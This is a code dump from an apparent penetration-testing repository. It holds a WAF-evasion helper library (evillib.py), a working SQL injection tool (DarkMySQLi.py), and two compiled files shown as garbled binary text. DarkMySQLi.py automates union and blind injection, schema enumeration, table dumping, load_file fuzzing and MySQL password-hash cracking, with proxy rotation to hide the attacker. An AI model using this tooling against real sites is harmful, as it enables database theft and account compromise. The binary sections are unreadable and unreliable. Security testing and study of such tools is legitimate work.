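# BeautifulSoup treats 'b' as non-nestable, so the second <b> closes the first:
print BeautifulSoup(fragment)                 # <b>Foo</b><b>Bar</b>
# ICantBelieveItsBeautifulSoup lists 'b' as nestable and keeps the structure:
print ICantBelieveItsBeautifulSoup(fragment)  # <b>Foo<b>Bar</b></b>

# UnicodeDammit: with no BOM or declared encoding (and chardet not installed),
# it falls back to trying utf-8, which succeeds here.
dammit = UnicodeDammit('Sacr\xc3\xa9 bleu!')
print repr(dammit.unicode), dammit.originalEncoding  # u'Sacr\xe9 bleu!' utf-8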
77,863
Python
.py
1,702
34.383079
186
0.584811
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
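The numeric fields in each record (size, total_lines, avg_line_length, max_line_length, alphanum_fraction) are derivable from the raw file. A sketch of one plausible derivation, assuming size is bytes and lines are split on '\n'; the dump's actual extraction pipeline is not shown here, so treat this as illustrative only.

def file_stats(path):
    # Hypothetical reconstruction of the record fields (Python 2).
    data = open(path, 'rb').read()
    lines = data.split('\n')
    alnum = sum(1 for ch in data if ch.isalnum())  # py2 bytes iterate as 1-char strs
    return {'size': len(data),
            'total_lines': len(lines),
            'avg_line_length': len(data) / float(len(lines)),
            'max_line_length': max(len(line) for line in lines),
            'alphanum_fraction': alnum / float(len(data))}

print file_stats('BeautifulSoup.py')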
18,909
evillib.pyc
pwnieexpress_raspberry_pwn/src/pentest/waffit/libs/evillib.pyc
[evillib.pyc — binary content omitted. This record stores CPython 2 compiled bytecode, which the dump rendered as unreadable mojibake; its readable fragments (license text, docstrings, identifiers) duplicate the evillib.py source in record 18,911 below.]
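For context on what this record held: a CPython 2 .pyc is an 8-byte header (a magic number plus the source mtime) followed by a marshalled code object. A hedged Python 2 sketch, assuming the evillib.py from record 18,911 sits in the working directory:

import py_compile, imp, struct

py_compile.compile('evillib.py')           # writes evillib.pyc next to the source
f = open('evillib.pyc', 'rb')
magic = f.read(4)                          # version-specific magic number
mtime = struct.unpack('<I', f.read(4))[0]  # source mtime, checked on import for staleness
f.close()
print magic == imp.get_magic(), mtime      # True when compiled by this interpreter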
13,390
Python
.py
92
143.684783
1,618
0.443291
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
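Note that this record labels compiled bytecode as language Python with extension .py. A cheap heuristic sketch for flagging such rows, based on the CPython 2 .pyc layout (a 2-byte version magic followed by '\r\n'):

def looks_like_py2_pyc(data):
    # Heuristic only: CPython 2 .pyc files begin with a 4-byte magic number
    # whose last two bytes are '\r\n' (e.g. '\x03\xf3\r\n' for 2.7).
    return len(data) >= 4 and data[2:4] == '\r\n'

print looks_like_py2_pyc(open('evillib.pyc', 'rb').read())  # True for a real .pyc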
18,910
BeautifulSoup.pyc
pwnieexpress_raspberry_pwn/src/pentest/waffit/libs/BeautifulSoup.pyc
[BeautifulSoup.pyc — binary content omitted. CPython 2 compiled bytecode of the BeautifulSoup.py source recorded above, rendered by the dump as unreadable mojibake; its readable fragments (module docstring, license, class docstrings) duplicate that source.]
66,733
Python
.py
479
135.605428
1,456
0.447157
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
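When only a .pyc like the one above survives, its top-level code object can still be unmarshalled and disassembled, but only by an interpreter whose magic number matches the file's; a minimal Python 2 sketch:

import dis, marshal

f = open('BeautifulSoup.pyc', 'rb')
f.read(8)                # skip the 8-byte header: magic number + source timestamp
code = marshal.load(f)   # raises if the .pyc came from a different Python version
f.close()
dis.dis(code)            # prints the bytecode of the module body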
18,911
evillib.py
pwnieexpress_raspberry_pwn/src/pentest/waffit/libs/evillib.py
#!/usr/bin/env python import re import sys import httplib import socket import urllib from urlparse import urlparse, urlunparse import logging from BeautifulSoup import BeautifulSoup __license__ = """ Copyright (c) 2009, {Sandro Gauci|Wendel G. Henrique} All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of EnableSecurity or Trustwave nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """ # unicode mapping borrowed from http://packetstormsecurity.org/web/unicode-fun.txt # by Gary O'leary-Steele of Sec-1 Ltd from urllib import quote, unquote unicodemapping = { ' ' : '%u0020', '/' : '%u2215', '\\' : '%u2215', "'" : '%u02b9', '"' : '%u0022', '>' : '%u003e', '<' : '%u003c', '#' : '%uff03', '!' : '%uff01', '$' : '%uff04', '*' : '%uff0a', '@' : '%u0040', '.' 
: '%uff0e', '_' : '%uff3f', '(' : '%uff08', ')' : '%uff09', ',' : '%uff0c', '%' : '%u0025', '-' : '%uff0d', ';' : '%uff1b', ':' : '%uff1a', '|' : '%uff5c', '&' : '%uff06', '+' : '%uff0b', '=' : '%uff1d', 'a' : '%uff41', 'A' : '%uff21', 'b' : '%uff42', 'B' : '%uff22', 'c' : '%uff43', 'C' : '%uff23', 'd' : '%uff44', 'D' : '%uff24', 'e' : '%uff45', 'E' : '%uff25', 'f' : '%uff46', 'F' : '%uff26', 'g' : '%uff47', 'G' : '%uff27', 'h' : '%uff48', 'H' : '%uff28', 'i' : '%uff49', 'I' : '%uff29', 'j' : '%uff4a', 'J' : '%uff2a', 'k' : '%uff4b', 'K' : '%uff2b', 'l' : '%uff4c', 'L' : '%uff2c', 'm' : '%uff4d', 'M' : '%uff2d', 'n' : '%uff4e', 'N' : '%uff2e', 'o' : '%uff4f', 'O' : '%uff2f', 'p' : '%uff50', 'P' : '%uff30', 'q' : '%uff51', 'Q' : '%uff31', 'r' : '%uff52', 'R' : '%uff32', 's' : '%uff53', 'S' : '%uff33', 't' : '%uff54', 'T' : '%uff34', 'u' : '%uff55', 'U' : '%uff35', 'v' : '%uff56', 'V' : '%uff36', 'w' : '%uff57', 'W' : '%uff37', 'x' : '%uff58', 'X' : '%uff38', 'y' : '%uff59', 'Y' : '%uff39', 'z' : '%uff5a', 'Z' : '%uff3a', '0' : '%uff10', '1' : '%uff11', '2' : '%uff12', '3' : '%uff13', '4' : '%uff14', '5' : '%uff15', '6' : '%uff16', '7' : '%uff17', '8' : '%uff18', '9' : '%uff19'} homoglyphicmapping = {"'" : '%ca%bc'} def oururlparse(target): log = logging.getLogger('urlparser') ssl = False o = urlparse(target) if o[0] not in ['http','https','']: log.error('scheme %s not supported' % o[0]) return if o[0] == 'https': ssl = True if len(o[2]) > 0: path = o[2] else: path = '/' tmp = o[1].split(':') if len(tmp) > 1: port = tmp[1] else: port = None hostname = tmp[0] query = o[4] return (hostname,port,path,query,ssl) def modifyurl(path,modfunc,log): path = path log.debug('path is currently %s' % path) #s = re.search('(\[.*?\])',path) for m in re.findall('(\[.*?\])',path): ourstr = m[1:-1] newstr = modfunc(ourstr) log.debug('String was %s' % ourstr) log.debug('String became %s' % newstr) path = path.replace(m,newstr) log.debug('the path is now %s' % path) return path def modifypath(path,newstrs,log,encode=True): log.debug('path is currently %s' % path) for m in re.findall('(\[.*?\])',path): ourstr = m[1:-1] for newstr in newstrs: if encode: newstr= urllib.quote(newstr) log.debug('String was %s' % ourstr) log.debug('String became %s' % newstr) newpath = path.replace(m,newstr).replace(']','').replace('[','') yield(newpath) def bruteforceascii(ourstr): listourstr = list(ourstr) for pos in xrange(len(ourstr)): for i in xrange(256): newlistourstr = listourstr[:] newlistourstr[pos] = chr(i) yield(quote(''.join(newlistourstr))) def unicodeurlencode(ourstr): newstr = str() for character in ourstr: if unicodemapping.has_key(character): newstr += unicodemapping[character] else: newstr += character return newstr def nullify(ourstr): newstr = str() for character in ourstr: newstr += character + "\x00" return quote(newstr) def replacechars(ourstr,origchar,newchar): newstr = ourstr.replace(origchar,newchar) return newstr def nullifyspaces(ourstr): return quote(replacechars(ourstr,' ','\x00')) def slashspaces(ourstr): return replacechars(ourstr,' ','/') def tabifyspaces(ourstr): return replacechars(ourstr,' ','\t') def crlfspaces(ourstr): return replacechars(ourstr,' ','\n') def backslashquotes(ourstr): return replacechars(ourstr,"'","\''") class waftoolsengine: def __init__(self,target='www.microsoft.com',port=80,ssl=False, debuglevel=0,path='/',followredirect=True): """ target: the hostname or ip of the target server port: defaults to 80 ssl: defaults to false """ self.target = target if port is None: if ssl: port 
= 443 else: port = 80 self.port = port self.ssl = ssl self.debuglevel=debuglevel self.cachedresponses = dict() self.requestnumber = 0 self.path = path self.redirectno = 0 self.followredirect = followredirect self.crawlpaths = list() def request(self,method='GET',path=None,usecache=True, cacheresponse=True, headers=None, comingfromredir=False): followredirect = self.followredirect if comingfromredir: self.redirectno += 1 if self.redirectno >= 5: self.log.error('We received way too many redirects.. stopping that') followredirect=False else: self.redirectno = 0 if path is None: path = self.path if headers is not None: knownheaders = map(lambda x: x.lower(), headers.keys()) else: knownheaders = {} headers = {} if not 'user-agent' in knownheaders: headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1b1) Gecko/20081007 Firefox/3.0' if not 'accept-charset' in knownheaders: headers['Accept-Charset'] = 'ISO-8859-1,utf-8;q=0.7,*;q=0.7' if not 'accept' in knownheaders: headers['Accept'] = '*/*' k = str([method,path,headers]) if usecache: if self.cachedresponses.has_key(k): self.log.debug('Using cached version of %s, %s' % (method,path)) return self.cachedresponses[k] else: self.log.debug('%s not found in %s' % (k,self.cachedresponses.keys())) if sys.hexversion > 0x2060000: if self.ssl: h = httplib.HTTPSConnection(self.target,self.port,timeout=4) else: h = httplib.HTTPConnection(self.target,self.port,timeout=4) else: if self.ssl: h = httplib.HTTPSConnection(self.target,self.port) else: h = httplib.HTTPConnection(self.target,self.port) if self.debuglevel <= 10: if self.debuglevel > 1: h.set_debuglevel(self.debuglevel) try: self.log.info('Sending %s %s' % (method,path)) h.request(method,path,headers=headers) except socket.error: self.log.warn('Could not initialize connection to %s' % self.target) return self.requestnumber += 1 try: response = h.getresponse() responsebody = response.read() h.close() r = response, responsebody except (socket.error,socket.timeout,httplib.BadStatusLine): self.log.warn('Hey.. they closed our connection!') r = None if cacheresponse: self.cachedresponses[k] = r if r: if response.status in [301,302,307]: if followredirect: if response.getheader('location'): newloc = response.getheader('location') self.log.info('Redirected to %s' % newloc) pret = oururlparse(newloc) if pret is not None: (target,port,path,query,ssl) = pret if not port: port = 80 if target == '': target = self.target if port is None: port = self.port if not path.startswith('/'): path = '/'+path if (target,port,ssl) == (self.target,self.port,ssl): r = self.request(method,path,usecache,cacheresponse, headers,comingfromredir=True) else: self.log.warn('Tried to redirect to a different server %s' % newloc) else: self.log.warn('%s is not a well formatted url' % response.getheader('location')) return r def querycrawler(self,path=None,curdepth=0,maxdepth=1): self.log.debug('Crawler is visiting %s' % path) localcrawlpaths = list() if curdepth > maxdepth: self.log.info('maximum depth %s reached' % maxdepth) return r = self.request(path=path) if r is None: return response, responsebody = r try: soup=BeautifulSoup(responsebody) except: self.log.warn('could not parse the response body') return tags = soup('a') for tag in tags: try: href = tag["href"] if href is not None: tmpu = urlparse(href) if (tmpu[1] != '') and (self.target != tmpu[1]): # not on the same domain name .. 
ignore self.log.debug('Ignoring link because it is not on the same site %s' % href) continue if tmpu[0] not in ['http','https','']: self.log.debug('Ignoring link because it is not an http uri %s' % href) continue path = tmpu[2] if not path.startswith('/'): path = '/'+path if len(tmpu[4]) > 0: # found a query .. thats all we need location = urlunparse(('','',path,tmpu[3],tmpu[4],'')) self.log.info('Found query %s' % location) return href if path not in self.crawlpaths: href = urllib.unquote(path) self.log.debug('adding %s for crawling' % href) self.crawlpaths.append(href) localcrawlpaths.append(href) except KeyError: pass for nextpath in localcrawlpaths: r = self.querycrawler(path=nextpath,curdepth=curdepth+1,maxdepth=maxdepth) if r: return r def scrambledheader(header): c = 'connection' if len(header) != len(c): return False if header == c: return False for character in c: if c.count(character) != header.count(character): return False return True
14,944
Python
.py
366
26.401639
131
0.47451
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
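The unicodemapping table at the top of evillib.py drives unicodeurlencode(), which swaps each payload character for a %uXXXX full-width Unicode escape in the hope that the WAF and the backend normalize the request differently. A minimal self-contained sketch of that substitution follows; demo_mapping and unicode_evade are illustrative names invented here (the real function is unicodeurlencode and it ships the full table).

# Sketch of the %uXXXX evasion idea behind evillib's unicodeurlencode().
# demo_mapping is a four-entry subset of the real unicodemapping table;
# unmapped characters pass through unchanged, mirroring the original's
# fallback branch.
demo_mapping = {
    ' ': '%u0020',   # space
    "'": '%u02b9',   # modifier-letter prime, stands in for a single quote
    'a': '%uff41',   # full-width 'a'
    's': '%uff53',   # full-width 's'
}

def unicode_evade(payload):
    return ''.join(demo_mapping.get(ch, ch) for ch in payload)

print(unicode_evade("a' or 1=1"))  # -> %uff41%u02b9%u0020or%u00201=1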
18,912
DarkMySQLi.py
pwnieexpress_raspberry_pwn/src/pentest/darkmysqli/DarkMySQLi.py
#!/usr/bin/python # 1/30/09 ################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ \ _ \ __| _/____ # # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # # \/ \/ \/ # # ___________ ______ _ __ # # _/ ___\_ __ \_/ __ \ \/ \/ / # # \ \___| | \/\ ___/\ / # # \___ >__| \___ >\/\_/ # # est.2007 \/ \/ forum.darkc0de.com # ################################################################ # Multi-Purpose MySQL Injection Tool # FUNCTIONS # *union injection # *blind injection # *post and get method injection ** POST not working yet # *full information_schema enumeration # *table and column fuzzer # *database information extractor # *column length finder # *load_file fuzzer # *general info gathering # *MySQL hash cracker # FEATURES # *Round Robin Proxy w/ a proxy list (non-auth or auth proxies) # *Proxy Auth (works great with Squid w/ basic auth) # *Random browser agent chosen everytime the script runs # *debug mode for seeing every URL request, proxy used, browser agent used # Share the c0de! (f*ck Windows! Get a real OS!) # darkc0de Crew # www.darkc0de.com # rsauron[at]gmail[dot]com # Greetz to # d3hydr8, Tarsian, c0mrade (r.i.p brotha), reverenddigitalx, rechemen # and the darkc0de crew # This was written for educational purpose only. Use it at your own risk. # Author will be not responsible for any damage! # Intended for authorized Web Application Pen Testing! # CHANGES # 1.6 ADDED --end evasion setting # 1.5 Fixed --strart now starts at correct number instead of +1 # 1.4 Fixed schema mode when a table was specified - app would hand after last column # 1.3 Fixed Regular Expression Search in dump mode (should fixs issues of crazy html code when dumping) # 1.2 Fixed mode findcol - the way it replaced darkc0de in the output URL string # BE WARNED, THIS TOOL IS VERY LOUD.. import urllib, sys, re, os, socket, httplib, urllib2, time, random ##Set default evasion options here arg_end = "--" # examples "--", "/*", "#", "%00", "--&SESSIONID=00hn3gvs21lu5ke2f03bxr" <-- if you need vars after inj point arg_eva = "+" # examples "/**/" ,"+", "%20" ## colMax variable for column Finder colMax = 200 ## Set the default timeout value for requests socket.setdefaulttimeout(10) ## Default Log File Name logfile = "darkMySQLi.log" ## File Location to fuzz with for TABLE fuzzer tablefuzz = "tablesfuzz.txt" ## File Location to fuzz with for COLUMN fuzzer columnfuzz = "columnsfuzz.txt" ## File Location to fuzz with for LOAD_FILE fuzzer loadfilefuzz = "loadfilefuzz.txt" ## Agents agents = ["Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)", "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)", "Microsoft Internet Explorer/4.0b1 (Windows 95)", "Opera/8.00 (Windows NT 5.1; U; en)"] #URL Get Function def GetThatShit(head_URL): source = "" global gets;global proxy_num head_URL = head_URL.replace("+",arg_eva) request_web = urllib2.Request(head_URL) request_web.add_header('User-Agent',agent) while len(source) < 1: if arg_debug == "on": print "\n[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n" try: gets+=1;proxy_num+=1 source = proxy_list[proxy_num % proxy_len].open(request_web).read() except (KeyboardInterrupt, SystemExit): raise except (urllib2.HTTPError): print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Trying again!" 
print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n" break except: print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Look at the error and try to figure it out!" print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n" raise return source #the guts and glory - Binary Algorithim that does all the guessing for the Blind Methodology def GuessValue(URL): lower = lower_bound;upper = upper_bound while lower < upper: try: mid = (lower + upper) / 2 head_URL = URL + ">"+str(mid) source = GetThatShit(head_URL) match = re.findall(arg_string,source) if len(match) >= 1: lower = mid + 1 else: upper = mid except (KeyboardInterrupt, SystemExit): raise except: pass if lower > lower_bound and lower < upper_bound: value = lower else: head_URL = URL + "="+str(lower) source = GetThatShit(head_URL) match = re.findall(arg_string,source) if len(match) >= 1: value = lower else: value = 63 print "Could not find the ascii character! There must be a problem.." print "Check to make sure your using the my script right!" print "READ xprog's blind sql tutorial!\n" sys.exit(1) return value ## Functions for MySQL5 hash cracking --- THANKS d3hydr8 def c1(word): s = hashlib.sha1() s.update(word[:-1]) s2 = hashlib.sha1() s2.update(s.digest()) return s2.hexdigest() def c2(word): s = sha.new() s.update(word[:-1]) s2 = sha.new() s2.update(s.digest()) return s2.hexdigest() ## Funtion for MySQL323 hash cracking def mysql323(clear): # Taken almost verbatim from mysql's source nr = 1345345333 add = 7 nr2 = 0x12345671 retval = "" for c in clear: if c == ' ' or c == '\t': continue tmp = ord(c) nr ^= (((nr & 63) + add) * tmp) + (nr << 8) nr2 += (nr2 << 8) ^ nr add += tmp res1 = nr & ((1 << 31) - 1) res2 = nr2 & ((1 << 31) - 1) return "%08lx%08lx" % (res1, res2) #say hello if len(sys.argv) <= 1: print "\n|--------------------------------------------------|" print "| rsauron@gmail.com v1.6 |" print "| 1/2009 darkMySQLi.py |" print "| -- Multi Purpose MySQL Injection Tool -- |" print "| Usage: darkMySQLi.py [options] |" print "| -h help darkc0de.com |" print "|--------------------------------------------------|\n" sys.exit(1) #help option for arg in sys.argv: if arg == "-h" or arg == "--help": print "\n darkMySQLi v1.6 rsauron@gmail.com" print " forum.darkc0de.com" print "Usage: ./darkMySQLi.py [options]" print "Options:" print " -h, --help shows this help message and exits" print " -d, --debug display URL debug information\n" print " Target:" print " -u URL, --url=URL Target url\n" print " Methodology:" print " -b, --blind Use blind methodology (req: --string)" print " -s, --string String to match in page when the query is valid" print " Method:" print " --method=PUT Select to use PUT method ** NOT WORKING" print " Modes:" print " --dbs Enumerate databases MySQL v5+" print " --schema Enumerate Information_schema (req: -D," print " opt: -T) MySQL v5+" print " --full Enumerate all we can MySQL v5+" print " --info MySQL Server configuration MySQL v4+" print " --fuzz Fuzz Tables & Columns Names MySQL v4+" print " --findcol Find Column length MySQL v4+" print " --dump Dump database table entries (req: -T," print " opt: -D, -C, --start) MySQL v4+" print " --crack=HASH Crack MySQL Hashs (req: --wordlist)" print " --wordlist=LIS.TXT Wordlist to be used for cracking" print " Define:" print " -D DB database to enumerate" print " -T TBL database table to enumerate" print " -C COL database table column to enumerate" print " Optional:" print " --ssl 
To use SSL" print " --end To use + and -- for the URLS --end \"--\" (Default)" print " To use /**/ and /* for the URLS --end \"/*\"" print " --rowdisp Do not display row # when dumping" print " --start=ROW Row number to begin dumping at" print " --where=COL,VALUE Use a where clause in your dump" print " --orderby=COL Use a orderby clause in your dump" print " --cookie=FILE.TXT Use a Mozilla cookie file" print " --proxy=PROXY Use a HTTP proxy to connect to the target url" print " --output=FILE.TXT Output results of tool to this file\n" sys.exit(1) #define variables site = "" proxy = "None" arg_string = "" arg_blind = "--union" arg_table = "None" arg_database = "None" arg_columns = "None" arg_row = "Rows" arg_cookie = "None" arg_insert = "None" arg_where = "" arg_orderby = "" arg_debug = "off" arg_rowdisp = 1 arg_adminusers = 10 arg_wordlist = "" arg_ssl = "off" arg_proxy_auth = "" darkc0de = "concat(0x1e,0x1e," mode = "None" lower_bound = 0 upper_bound = 16069 line_URL = "" count_URL = "" cur_db = "" cur_table = "" terminal = "" count = 0 gets = 0 table_num = 0 num = 0 ser_ver = 3 version =[] let_pos = 1 lim_num = 0 agent = "" #Check args for arg in sys.argv: if arg == "-u" or arg == "--url": site = sys.argv[count+1] elif arg == "--output": logfile = sys.argv[count+1] elif arg == "--proxy": proxy = sys.argv[count+1] elif arg == "--proxyauth": arg_proxy_auth = sys.argv[count+1] elif arg == "--dump": mode = arg;arg_dump = sys.argv[count] elif arg == "--full": mode = arg elif arg == "--schema": mode = arg;arg_schema = sys.argv[count] elif arg == "--dbs": mode = arg;arg_dbs = sys.argv[count] elif arg == "--fuzz": mode = arg;arg_fuzz = sys.argv[count] elif arg == "--info": mode = arg;arg_info = sys.argv[count] elif arg == "--crack": mode = arg;arg_hash = sys.argv[count+1] elif arg == "--wordlist": arg_wordlist = sys.argv[count+1] elif arg == "--findcol": mode = arg;arg_findcol = sys.argv[count] elif arg == "--cookie": arg_cookie = sys.argv[count+1] elif arg == "--ssl": arg_ssl = "on" elif arg == "-b" or arg == "--blind": arg_blind = arg;arg_blind = sys.argv[count] elif arg == "-s" or arg == "--string": arg_string = sys.argv[count+1] elif arg == "-D": arg_database = sys.argv[count+1] elif arg == "-T": arg_table = sys.argv[count+1] elif arg == "-C": arg_columns = sys.argv[count+1] elif arg == "--start": num = int(sys.argv[count+1]) - 1 table_num = num elif arg == "-d" or arg == "--debug": arg_debug = "on" elif arg == "--where": arg_where = sys.argv[count+1] elif arg == "--orderby": arg_orderby = sys.argv[count+1] elif arg == "--rowdisp": arg_rowdisp = sys.argv[count] arg_rowdisp = 0 elif arg == "--end": arg_end = sys.argv[count+1] if arg_end == "--": arg_eva = "+" else: arg_eva = "/**/" count+=1 #Title write file = open(logfile, "a") print "\n|--------------------------------------------------|" print "| rsauron@gmail.com v1.6 |" print "| 1/2009 darkMySQLi.py |" print "| -- Multi Purpose MySQL Injection Tool -- |" print "| Usage: darkMySQLi.py [options] |" print "| -h help darkc0de.com |" print "|--------------------------------------------------|\n" #Arg Error Checking if mode != "--crack" and site == "": print "[-] URL is required!\n[-] Need Help? --help\n" sys.exit(1) if mode == "None": print "[-] Mode is required!\n[-] Need Help? --help\n" sys.exit(1) if mode == "--schema" and arg_database == "None": print "[-] Must include -D flag!\n[-] Need Help? --help\n" sys.exit(1) if mode == "--dump": if arg_table == "None" or arg_columns == "None": print "[-] Must include -T and -C flag. 
-D is Optional\n[-] Need Help? --help\n" sys.exit(1) if proxy != "None": if len(proxy.split(".")) == 2: proxy = open(proxy, "r").read() if proxy.endswith("\n"): proxy = proxy.rstrip("\n") proxy = proxy.split("\n") if arg_ssl == "off": if site[:4] != "http": site = "http://"+site else: if site[:5] != "https": site = "https://"+site if site.endswith("/*"): site = site.rstrip('/*') if site.endswith("--"): site = site.rstrip('--') if arg_cookie != "None": try: cj = cookielib.MozillaCookieJar() cj.load(arg_cookie) cookie_handler = urllib2.HTTPCookieProcessor(cj) except: print "[!] There was a problem loading your cookie file!" print "[!] Make sure the cookie file is in Mozilla Cookie File Format!" print "[!] http://xiix.wordpress.com/2006/03/23/mozillafirefox-cookie-format/\n" sys.exit(1) else: cookie_handler = urllib2.HTTPCookieProcessor() if mode != "--findcol" and arg_blind != "--blind" and mode != "--crack" and site.find("darkc0de") == -1: print "[-] Site must contain \'darkc0de\'\n" sys.exit(1) if arg_blind == "--blind" and arg_string == "": print "[-] You must specify a --string when using blind methodology.\n" sys.exit(1) if arg_columns != "None": arg_columns = arg_columns.split(",") if arg_insert != "None": arg_insert = arg_insert.split(",") if mode == "--crack" and arg_wordlist == "": print "[-] You must specify a --wordlist to crack with.\n" sys.exit(1) agent = random.choice(agents) file.write("\n|--------------------------------------------------|") file.write("\n| rsauron@gmail.com v1.6 |") file.write("\n| 1/2009 darkMySQLi.py |") file.write("\n| -- Multi Purpose MySQL Injection Tool -- |") file.write("\n| Usage: darkMySQLi.py [options] |") file.write("\n| -h help darkc0de.com |") file.write("\n|--------------------------------------------------|") ## MySQL Hash cracking if mode == "--crack": try: arg_wordlist = open(arg_wordlist, "r") except(IOError): print "[-] Error: Check your wordlist path\n";file.write("\n[-] Error: Check your wordlist path\n") sys.exit(1) if len(arg_hash) != 40 and len(arg_hash) != 16: print "\n[-] Improper hash length\n";file.write("\n\n[-] Improper hash length\n") sys.exit(1) arg_wordlist = arg_wordlist.readlines() print "[+] Words Loaded:",len(arg_wordlist);file.write("\n[+] Words Loaded: "+str(len(arg_wordlist))) if len(arg_hash) == 40: print "[+] Detected MySQL v5 Hash:",arg_hash;file.write("\n[+] Detected MySQL v5 Hash: "+arg_hash) try: import hashlib for word in arg_wordlist: if arg_hash == c1(word): print "\n[!] Password is:",word;file.write("\n\n[!] Password is: "+word) break except(ImportError): import sha for word in arg_wordlist: if arg_hash == c2(word): print "\n[!] Password is:",word;file.write("\n\n[!] Password is: "+word) break else: print "[+] Detected MySQL v4 Hash:",arg_hash print "[+] Try darkc0de hash database @ " for word in arg_wordlist: word = word.rstrip("\n") if arg_hash == mysql323(word): print "\n[!] Password is:",word+"\n";file.write("\n\n[!] 
Password is: "+word+"\n") break print "[-] Finished Searching..\n[-] Done\n";file.write("\n[-] Finished Searching..\n[-] Done\n") sys.exit(1) #General Info print "[+] URL:",site;file.write("\n\n[+] URL: "+site) print "[+] %s" % time.strftime("%X");file.write("\n[+] %s" % time.strftime("%X")) print "[+] Evasion:",arg_eva,arg_end;file.write("\n[+] Evasion: "+arg_eva+" "+arg_end) print "[+] Cookie:", arg_cookie;file.write("\n[+] Cookie: "+arg_cookie) if site[:5] == "https": print "[+] SSL: Yes";file.write("\n[+] SSL: Yes") else: print "[+] SSL: No";file.write("\n[+] SSL: No") print "[+] Agent:",agent;file.write("\n[+] Agent: "+agent) #Build proxy list proxy_list = [];proxy_list_count = [] if proxy != "None": print "[+] Building Proxy List...";file.write("\n[+] Building Proxy List...") for p in proxy: try: match = re.findall(":",p) if len(match) == 3: arg_proxy_auth = [] prox = p.split(":") arg_proxy_auth += prox if arg_proxy_auth != "": proxy_auth_handler = urllib2.HTTPBasicAuthHandler() proxy_auth_handler.add_password("none",p,arg_proxy_auth[2],arg_proxy_auth[3]) opener = urllib2.build_opener(proxy_auth_handler) opener.open("http://www.google.com") proxy_list.append(urllib2.build_opener(proxy_auth_handler, cookie_handler)) proxy_list_count.append(p);arg_proxy_auth = "" else: proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'}) opener = urllib2.build_opener(proxy_handler) opener.open("http://www.google.com") proxy_list.append(urllib2.build_opener(proxy_handler, cookie_handler)) proxy_list_count.append(p) if len(match) == 3 or len(match) == 1: print "\tProxy:",p,"- Success";file.write("\n\tProxy:"+p+" - Success") else: print "\tProxy:",p,arg_proxy_auth[2]+":"+arg_proxy_auth[3]+"- Success";file.write("\n\tProxy:"+p+" - Success") except: print "\tProxy:",p,"- Failed [ERROR]:",sys.exc_info()[0];file.write("\n\tProxy:"+p+" - Failed [ERROR]: "+str(sys.exc_info()[0])) pass if len(proxy_list) == 0: print "[-] All proxies have failed. App Exiting" sys.exit(1) print "[+] Proxy List Complete";file.write("\n[+] Proxy List Complete") else: print "[-] Proxy Not Given";file.write("\n[+] Proxy Not Given") proxy_list.append(urllib2.build_opener(cookie_handler)) proxy_list_count.append("None") proxy_num = 0 proxy_len = len(proxy_list) ## Blind String checking! if arg_blind == "--blind": print "[!] Blind Methodology will be used!";file.write("\n[!] Blind Methodology will be used!") head_URL = site+"+AND+1=1" source = GetThatShit(head_URL) match = re.findall(arg_string,source) if len(match) >= 2: print "\n[-] The String you used has been found on the target page in-use more than 2 times" print "[-] This might lead to false positives with the blind methodology" print "[-] Might not mean anything.. I am just trying to help out.." print "[-] If you have problems you might know why.. 
